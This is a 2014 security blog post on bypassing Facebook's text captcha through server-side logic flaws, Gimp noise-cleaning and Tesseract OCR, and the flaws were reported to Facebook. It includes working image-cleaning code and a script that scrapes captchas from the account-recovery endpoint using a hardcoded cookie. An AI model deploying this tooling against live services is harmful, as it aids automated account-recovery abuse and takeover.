Thursday, 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - Not every character had to be correct. If you got one character wrong, the captcha would still be accepted.

Issue #2 - The captcha check was case insensitive. Despite the images using both uppercase and lowercase letters, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string, randomly chosen from a pool of 62^7 possibilities (7 characters, each drawn from 26 lowercase letters, 26 uppercase letters and 10 digits). For some reason, though, I encountered repetition. This is obviously very bad: with a limited set of captchas, an attacker can just download every image, solve them all once and achieve a 100% bypass rate from then on. I have no idea what caused this issue and Facebook didn't release any details.
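
To put some numbers on the first two issues, here is a rough sketch of how the check appeared to behave from the outside. The function name `lenient_match`, the one-character tolerance and the equal-length requirement are assumptions based on the behaviour described above; the real server-side logic was never published.

```python
import string

ALPHABET = string.ascii_letters + string.digits  # 62 characters
LENGTH = 7  # captcha length implied by the 62^7 figure


def lenient_match(guess, answer, max_wrong=1):
    """Hypothetical model of the observed check: case-insensitive,
    and up to max_wrong characters may differ."""
    if len(guess) != len(answer):
        return False
    wrong = sum(g != a for g, a in zip(guess.lower(), answer.lower()))
    return wrong <= max_wrong


# Size of the intended keyspace versus the case-insensitive one.
full_keyspace = len(ALPHABET) ** LENGTH
folded_keyspace = 36 ** LENGTH

# Case-folded strings accepted for a single captcha: the exact answer
# plus every string that differs in exactly one of the 7 positions.
accepted_per_captcha = 1 + LENGTH * (36 - 1)

print(full_keyspace, folded_keyspace, accepted_per_captcha)
```

Under these assumptions the keyspace drops from roughly 3.5 trillion strings to roughly 78 billion, and 246 of those are accepted for any one image. More importantly for OCR, the reader only has to get 6 of the 7 characters right and can ignore case completely.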

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there are a few things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad

I did some testing with Tesseract and found that noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above returned invalid characters or nothing at all. To improve Tesseract's results I needed some way to get rid of the noise and repair the damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

First up, I loaded the image and doubled its size. I found that processing a smaller image was less accurate and reduced the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. I selected by colour (black) and then shrank the selection, which dropped the thin black lines and left just the black letters selected. To actually paint over the noise I re-grew the selection, filled it black, inverted it and painted white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)
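
If you don't have Gimp to hand, the shrink-then-grow trick can be illustrated on a tiny binary mask. This is a minimal pure-Python sketch, assuming a square 3x3 neighbourhood; Gimp's own shrink and grow may treat corners and edges differently, and the helper names `erode` and `dilate` are hypothetical.

```python
def erode(mask):
    """Keep a pixel only if it and all 8 neighbours are set (shrink by 1)."""
    h, w = len(mask), len(mask[0])
    out = [[0] * w for _ in range(h)]
    for y in range(h):
        for x in range(w):
            out[y][x] = int(all(
                0 <= y + dy < h and 0 <= x + dx < w and mask[y + dy][x + dx]
                for dy in (-1, 0, 1) for dx in (-1, 0, 1)
            ))
    return out


def dilate(mask):
    """Set a pixel if it or any of its 8 neighbours is set (grow by 1)."""
    h, w = len(mask), len(mask[0])
    out = [[0] * w for _ in range(h)]
    for y in range(h):
        for x in range(w):
            out[y][x] = int(any(
                0 <= y + dy < h and 0 <= x + dx < w and mask[y + dy][x + dx]
                for dy in (-1, 0, 1) for dx in (-1, 0, 1)
            ))
    return out


# Toy image: a 1-pixel noise line on row 1 and a 3x3 "character" stroke.
mask = [[0] * 10 for _ in range(7)]
for x in range(10):
    mask[1][x] = 1
for y in range(3, 6):
    for x in range(2, 5):
        mask[y][x] = 1

opened = dilate(erode(mask))
for row in opened:
    print("".join("#" if v else "." for v in row))
```

The thin line disappears during the shrink and never comes back, while the thick stroke is reduced to its core and then restored by the grow. The script above grows by 2 rather than 1, so the recovered characters end up slightly fatter than they started.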

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection down 4 pixels (positive y is down) and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection up 10 pixels (6 above its starting position) and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)
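
The translate-and-paint step boils down to taking the union of the character mask with two vertically shifted copies of itself. Here is a small sketch of that idea on a toy mask; `shift_rows` and `union` are hypothetical helpers, and the offsets mirror the script (4 one way, then 10 back, for a net 6 the other way).

```python
def shift_rows(mask, dy):
    """Return a copy of mask moved dy rows (positive = down the image)."""
    h, w = len(mask), len(mask[0])
    out = [[0] * w for _ in range(h)]
    for y in range(h):
        src = y - dy
        if 0 <= src < h:
            out[y] = list(mask[src])
    return out


def union(*masks):
    """Pixel-wise OR of equally sized masks."""
    h, w = len(masks[0]), len(masks[0][0])
    return [[int(any(m[y][x] for m in masks)) for x in range(w)]
            for y in range(h)]


# Toy stroke: a vertical line in column 2 with a two-row gap where a
# white scribble crossed it.
mask = [[0] * 5 for _ in range(12)]
for y in range(12):
    if y not in (5, 6):
        mask[y][2] = 1

filled = union(mask, shift_rows(mask, 4), shift_rows(mask, -6))
```

The gap is covered by the copy shifted 4 rows, so the stroke comes out solid. The trade-off is that every stroke gets smeared vertically, which is one reason the cleaned characters can look a little heavier than the originals.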

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"
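
To clean a whole folder of captchas, the same command can be driven from Python. This is only a sketch: it assumes `gimp-console-2.8.exe` is on the PATH and that the `python-clean` plug-in is already registered, and the helper names `gimp_clean_command` and `clean_all` are made up for illustration.

```python
import subprocess

GIMP = "gimp-console-2.8.exe"  # executable name taken from the command above


def gimp_clean_command(path):
    """Build the argument list for one non-interactive cleaning run."""
    # Escape backslashes and quotes so the path is a valid Script-Fu string.
    escaped = path.replace("\\", "\\\\").replace('"', '\\"')
    batch = '(python-clean RUN-NONINTERACTIVE "%s")' % escaped
    return [GIMP, "-i", "-b", batch, "-b", "(gimp-quit 0)"]


def clean_all(paths):
    """Run the cleaning script once per file (requires Gimp to be installed)."""
    for path in paths:
        subprocess.call(gimp_clean_command(path))
```

Passing the arguments as a list lets `subprocess` handle the shell quoting, so only the Script-Fu string itself needs escaping.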

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.png output -psm 8 nobatch fb

I created the fb character set file in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs". It contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
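
For scripting, the Tesseract call can be wrapped in a few small functions. This is a sketch under the same assumptions as the command above (`tesseract.exe` on the PATH, an `fb` config already installed); the function names are hypothetical, and the output filter is an extra safety net rather than something Tesseract requires.

```python
import string
import subprocess

# Same characters, in the same order, as the whitelist line above.
WHITELIST = string.ascii_lowercase + string.ascii_uppercase + "1234567890"


def whitelist_config():
    """Text of the 'fb' config file described above."""
    return "tessedit_char_whitelist " + WHITELIST + "\n"


def tesseract_command(image, output_base="output"):
    """Same arguments as the command line above, as a list."""
    return ["tesseract.exe", image, output_base, "-psm", "8", "nobatch", "fb"]


def read_guess(output_base="output"):
    """Tesseract writes its result to <output_base>.txt; keep only
    whitelisted characters (drops whitespace and newlines)."""
    with open(output_base + ".txt") as handle:
        text = handle.read()
    return "".join(ch for ch in text if ch in WHITELIST)


def ocr(image):
    """Run Tesseract on one image and return the cleaned-up guess."""
    subprocess.call(tesseract_command(image))
    return read_guess()
```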


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack. I'm leaving this step as homework for you guys; best script wins $1 via Paypal ;) (I am of course joking, don't actually do this!)

Theoretically though, if you did want to build a fully functioning script, you'd just need to take the Python script from my Bugcrowd post and the cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import Request, urlopen, urlretrieve
import re

def getpage():
    #POST to the recovery page; returns (ccode, chash) match lists, or None on failure
    try:
        print("[+] POSTing to fb")
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        #Challenge code candidates: 43 lowercase letters, digits or hyphens
        ccode = re.findall('[a-z0-9-]{43}', response)
        #Challenge hash candidates: 814 URL-safe characters
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response")
        return ccode, chash
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")
        return None

def getcaptcha(i, ccode, chash):
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")
    except IndexError as e:
        #The response did not contain the expected code/hash matches
        print("*****Error: Captcha parameters not found*****")

print("[+] Start!")
for i in range(0, 1000):
    #Download page and parse data
    parsed = getpage()
    #Download captcha image (skipped if the page request failed)
    if parsed is not None:
        getcaptcha(i, *parsed)
print("[+] Finished!")
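
Once a batch of images is on disk, one quick way to look for the repetition issue is to group the files by hash. This sketch only catches byte-identical files; whether the repeats seen in testing were byte-identical or re-rendered images of the same string isn't something this post establishes, so treat it as a first check. The function name `find_repeats` is hypothetical, and the default pattern matches the `fbcap<i>.png` names used by the download script.

```python
import glob
import hashlib
from collections import defaultdict


def find_repeats(pattern="fbcap*.png"):
    """Group files matching pattern by the SHA-256 of their bytes and
    return the groups that contain more than one file."""
    groups = defaultdict(list)
    for path in sorted(glob.glob(pattern)):
        with open(path, "rb") as handle:
            digest = hashlib.sha256(handle.read()).hexdigest()
        groups[digest].append(path)
    return [paths for paths in groups.values() if len(paths) > 1]
```

Any non-empty result means at least one image was served more than once, which is all an attacker needs to start building a lookup table of solved captchas.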



Final Results

So I guess you're wondering, how accurate was Tesseract? Well, on a sample of 50 captchas that had been cleaned with Gimp, Tesseract read every character correctly about 20% of the time. However, taking the logic flaws into account, the actual pass rate jumped to 50%.
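
To see what those rates mean for an attacker who can simply retry, here is a quick back-of-the-envelope sketch. It assumes each attempt gets a fresh captcha and that attempts succeed independently, which is a simplification; the function names are made up for illustration.

```python
def expected_attempts(p):
    """Mean number of tries until the first success (geometric distribution)."""
    return 1.0 / p


def chance_within(p, n):
    """Probability of at least one success in n independent tries."""
    return 1.0 - (1.0 - p) ** n


for rate in (0.20, 0.50):
    print(rate, expected_attempts(rate), round(chance_within(rate, 5), 3))
```

At a 20% pass rate you'd expect to need 5 attempts on average, and at 50% just 2. Either way, a handful of retries is enough to get through most of the time.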

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. That said, you can also see how even subtle changes in the initial image can significantly affect both the cleaning output and the final analysis.


Facebook Fix #1

After I reported these issues, the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha's strength, as it's the thickness of the noise relative to the characters that matters, not the absolute thickness. Making the noise thicker and the characters thinner would have prevented noise removal through selection shrinking.
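
The relative thickness argument can be checked with a little arithmetic. The sketch below assumes a shrink of radius r eats r pixels from each side of a stroke, which is an idealised model of what Gimp does, and the stroke widths in the examples are made-up numbers rather than measurements from real captchas.

```python
def survives_shrink(width, radius):
    """A stroke loses `radius` pixels from each side when the selection
    shrinks, so it only survives if it is wider than 2 * radius."""
    return width > 2 * radius


def separable(noise_width, char_width):
    """True if some whole-pixel shrink radius removes the noise strokes
    while leaving part of the character strokes selected."""
    return any(
        not survives_shrink(noise_width, r) and survives_shrink(char_width, r)
        for r in range(1, char_width)
    )


print(separable(1, 3))  # thin noise, thick characters
print(separable(2, 6))  # everything thicker, same ratio
print(separable(4, 2))  # thick noise, thin characters
```

The first two cases are both separable, which is why scaling everything up didn't help. Only the third case, where the noise is at least as thick as the characters, leaves no shrink radius that removes one without the other.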


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass rate with OCR alone, and I'm sure that with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection down 4 pixels (positive y is down) and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection up 10 pixels (6 above its starting position) and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

6 comments:

  1. Hi,

    Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?

  2. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)